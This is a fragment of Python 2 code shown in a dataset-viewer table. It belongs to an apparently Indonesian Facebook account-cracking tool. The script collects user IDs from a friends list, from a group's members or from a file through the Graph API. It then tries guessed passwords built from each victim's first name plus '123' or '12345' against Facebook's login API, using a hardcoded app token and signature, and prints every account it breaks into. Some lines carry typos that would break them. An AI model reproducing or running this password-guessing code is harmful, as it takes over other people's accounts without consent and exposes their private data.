text stringlengths 0 93.6k |
|---|
os.system('clear') |
print logo |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
print '║-> \x1b[1;37;40m1. Crack from Friends' |
print '║-> \x1b[1;37;40m2. Crack from Group' |
print '║-> \x1b[1;37;40m3. Crack from File' |
print '║-> \x1b[1;31;40m0. Kembali' |
print '\x1b[1;37;40m║' |
pilih_super() |
def pilih_super(): |
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') |
if peak == '': |
print '\x1b[1;91m[!] Can\'t empty' |
pilih_super() |
else: |
if peak == '1': |
os.system('clear') |
print logo |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...') |
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) |
z = json.loads(r.text) |
for s in z['data']: |
id.append(s['id']) |
else: |
if peak == '2': |
os.system('clear') |
print logo |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') |
try: |
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) |
asw = json.loads(r.text) |
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] |
except KeyError: |
print '\x1b[1;91m[!] Group not found' |
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') |
super() |
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) |
s = json.loads(re.text) |
for i in s['data']: |
id.append(i['id']) |
else: |
if peak == '3': |
os.system('clear') |
print logo |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
try: |
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') |
for line in open(idlist,'r').readlines(): |
id.append(line.strip()) |
except IOError: |
print '\x1b[1;91m[!] File not found' |
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') |
super() |
else: |
if peak == '0': |
menu_hack() |
else: |
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' |
pilih_super() |
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) |
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') |
titik = ['. ', '.. ', '... '] |
for o in titik: |
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, |
sys.stdout.flush() |
time.sleep(0.01) |
print |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
def main(arg): |
user = arg |
try: |
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) |
b = json.loads(a.text) |
pass1 = b['first_name'] + '123' |
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') |
q = json.load(data) |
if 'access_token' in q: |
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name'] |
else: |
if 'www.facebook.com' in q['error_msg']: |
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name'] |
else: |
pass2 = b['firs_name'] + '12345' |
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') |
q = json.load(data) |
if 'access_token' in q: |
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name'] |
else: |
if 'www.facebook.com' in q['error_msg']: |
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name'] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.